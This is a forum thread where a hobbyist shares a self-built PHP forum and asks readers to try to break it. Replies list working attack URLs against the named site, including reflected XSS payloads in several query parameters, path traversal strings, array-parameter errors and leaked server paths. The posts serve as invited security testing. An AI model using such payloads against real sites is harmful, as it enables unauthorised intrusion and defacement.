My Forum - From Scratch

[miniport_owner]

Ok, so I've been making my own forum from scratch in PHP, Ive posted it lots of other places but I thought it was time to post it here.

 

Note: forum is being rewriten because of people hacking

Note2: Yu cannot login/register now as I am making the security on thos ebetter. but you can still post, etc.

 

Hackers: Try your hardest to hack this please, and tell me if you do and how you did it.

 

 

Now to the post.

 

 

 

 

*Click Here For Beta Forum*

 

Forum  still being rewriten but you can still check out beta!

 

___Features___

]Post

]Categories

]Create Topic

]Log in

]Register

]User List

]ACP (Admin Control Panel)

]User Panel

]5 Smiley's

]BB Code

]Avatars

]Sigy's

]Nice looking clickable smiley List

 

___Features To Come___

]PM's - 50%

]MySql transition (switching from files to MySql) - 1%

]Need Suggestions!

 

Some wip features may be on forum for testing.

 

Please give criticism!

 

Feature suggestions Please!

 

History

12/7/7 - Released

12/7/7 - Added topic creation

12/7/7 - Added log in

12/7/7 - Fix some small bugs

12/7/7 - Added User List

12/7/7 - Added ACP

12/7/7 - Added User Panel

12/7/7 - Added smiley

12/7/7 - Added code

12/7/7 - Added Auto Line Break

12/7/7 - Added avatar function

12/7/7 - Made posts more neat

12/7/7 - Added more codes

12/7/7 - Fixed minor glitch

13/7/7 - Fixed major error

13/7/7 - Added sigy's

13/7/7 - Added demo acount

13/7/7 - Added grafix

16/7/7 - Added Clickable smiley list

16/7/7 - Made the clickable smiley list look better

 

 

Please hack!

 

 

 

~MiniPort_Owner Aka: mini

[agentsteal]

Array:

http://blokdudez.110mb.com/forum/show_cat.php?cat[]

 

Array:

http://blokdudez.110mb.com/forum/show_post.php?cat=General&TOP[]

 

Array:

http://blokdudez.110mb.com/topic.php?topic[]

 

Cross Site Scripting:

http://blokdudez.110mb.com/forum/do_post.php?path=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://blokdudez.110mb.com/forum/make_topic.php?path='><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://blokdudez.110mb.com/forum/show_cat.php?cat=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://blokdudez.110mb.com/forum/show_post.php?cat=General&TOP=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://blokdudez.110mb.com/topic.php?topic=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

There is Cross Site Scripting if you post a topic that contains "code.

 

Full Path Disclosure:

http://blokdudez.110mb.com/forum/make_topic.php

Warning: copy(/Topic/index.htm) [function.copy]: failed to open stream: No such file or directory in /www/110mb.com/b/l/o/k/d/u/d/e/blokdudez/htdocs/forum/bin/make_topic.php on line 19

[miniport_owner]

Also XSS:

http://blokdudez.110mb.com/forum/show_post.php?cat=General&TOP=<marquee>

I know how to fix that, thanx

 

http://blokdudez.110mb.com/forum/show_cat.php?cat[]=Test%20Forum%20Stuff%20Here

 

 

Category Array does not exist or has been removed.

I have no clue why it did that 

 

Did any1 notice any problem with security though?

[miniport_owner]

OK, sum1 hacked the forum and spammed it bad so I had to delete it and now I have to wait for my webhost to delete the spam!

 

kk?

[miniport_owner]

Ok! Spam deleted!

 

Plz try still to hack but dont totaly destroy it.

 

Oh, and Iv added:

-Encrypted passwords!

-PMs!

-Site statistics(bottom page)!

-SESSIOn instead of Cookies!

 

~Miniport_owner

[source]

I registered the nick "<marquee>shit"

and it works...

 

http://blokdudez.110mb.com/forum/show_post.php?cat=General&TOP=\%22%3E%3Cmarquee%3Eownd%20bitch

 

omfg tooo many xss/holes...

 

 

http://blokdudez.110mb.com/forum/make_topic.php?path=../../

path disclosure.

 

messages == xssable...

 

fix the holes then try again, and use  DB instead of w/e you are currently doing.

 

http://blokdudez.110mb.com/forum/show_post.php?cat=../../

[LiamProductions]

Your forum would be too easy to spam.